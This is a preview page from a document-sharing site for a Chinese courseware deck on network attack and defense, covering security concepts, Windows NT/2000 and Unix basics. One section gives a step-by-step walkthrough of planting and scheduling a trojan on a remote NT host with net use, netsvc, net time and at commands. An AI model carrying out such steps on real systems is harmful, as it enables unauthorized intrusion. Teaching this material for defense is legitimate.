返回
《网络攻击与防御》PPT课件

《网络攻击与防御》PPT课件

ID:39060212

大小:1.76 MB

页数:47页

时间:2019-06-24

《网络攻击与防御》PPT课件_第1页
《网络攻击与防御》PPT课件_第2页
《网络攻击与防御》PPT课件_第3页
《网络攻击与防御》PPT课件_第4页
《网络攻击与防御》PPT课件_第5页
资源描述:

《《网络攻击与防御》PPT课件》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、网络攻击与防御本节提要1.网络安全概述2.一个网络安全有关的案例3.与网络安全有关的协议网络安全概述网络安全定义指网络系统的硬件、软件及系统中的数据受到保护,不会遭受恶意的破坏、更改和泄漏,系统可以正常的运行网络安全概述什么是不安全的网络环境信息丢失信息战内部泄密外部泄密自然灾害、意外事故计算机犯罪网络协议中的缺陷,例如TCP/IP协议的缺陷电子谍报,比如信息流量分析、信息窃取等人为行为,比如使用不当,安全意识差等“黑客”行为,比如非法访问、非法连接一个关于网络安全的实例一次迅速入侵NT架构操作系统的方法操作系统平台:必须为NT,可

2、以是WINNT4.0或5.0;WorkStation或Server;还可以是WIN2000。工具:Netsvc.exe用于启动远程主机的schedule服务。1.打开DOS窗口,输入netuse\ip连接上目标主机。把木马上传到目标主机。建议放在你共享的所在目录,或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能,所以一般不会被管理员发现。  上传木马后,键入:C:/>netsvc\ipschedule/start启动目标主机的schedule服务(schedule服务用来定时执行某程序,我们可利用它来执

3、行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,然后键入C:/>nettime\ip将显示目标主机的系统时间,如:14:43记住这时间,接下来用AT命令往目标主机添加入定时启动木马程序的任务,键入:C:/>at\ip14:45trojan.exe注意:这里我启动时间定为14:45而不是14:43,往后推迟了几分钟,这是考虑到命令往返于两机需要一定的时间至此,你只要等稍等几分钟过去,就可以打开你的木马客户器控制目标主机了,也不用那么麻烦地执行程序啦!入侵分析这次入侵使用了一些DOS系统中的常用命令例如netu

4、se\ipC:/>netsvc\ipschedule/startC:/>nettime\ipC:/>at\ip14:45trojan.exe使用了木马程序Netsvc.exe学习网络攻击与防御我们需要哪些知识1.对操作系统的理解2.对网络框架与协议的理解3.常用网络命令的掌握4.掌握通过工具捕获网络信息的方法5.对捕获的网络信息有分析能力6.掌握路由器与交换机的工作原理与配置方法7.会设置防火墙操作系统介绍常用操作系统的架构介绍一.基于windowsNT架构系统Windows2000server系统特点:1.支持NTFS格式

5、系统文件2.win2000系统支持127位的字符口令3.ActiveDirectory与Windows2000安全服务(如Kerberos身份验证协议、公钥基本结构、加密文件系统(EFS)、安全性配置管理器、组策略以及委派管理等)紧密集成。说明1.什么是NTFS(NewTechnologyFileSystem)微软Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的Windows 2000/XP的普及,很多个人用户开始用到了NTFS。NTFS也是以簇为单位来

6、存储数据文件,但NTFS中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费,还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能,可为用户提供更高层次的安全保证。说明ActiveDirectory是指Windows2000网络中的目录服务。它有两个作用:1.目录服务功能2.集中式管理该技术还可以用来确保只有那些经过授权的用户或应用程序方可获准在具备安全保障的前提自下针对相关资源实施访问调用。Unix系统架构介绍UNIX,是一个强大的多用户、多任务操作系统,支持多种处理器架构unix是基于命令行的操作系统U

7、nix操作系统通常被分成三个主要部分:内核(Kernel)、Shell和文件系统。Unix系统权限介绍1.读许可权2.写许可权3.执行许可权Unix基本命令操作举例(1)首先让我们在当前目录下创建两个目录dir1,dir2:mkdirdir1dir2//输入命令后记得敲一下回车键: (2)进入目录dir1中创建文件file1,file2:cddir1               //进入目录dir1touchfile1file2//创建文件file1,file2(3)再进入目录dir2中创建文件file3,file4:cd..//返

8、回上一级目录cddir2//进入目录dir2touchfile3file4//创建文件file3,file4与DOS命令有些相似Unix常用操作界面网络安全概述网络安全定义指网络系统的硬件、软件及系统中的数据受到保护,不会遭受恶意的破

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。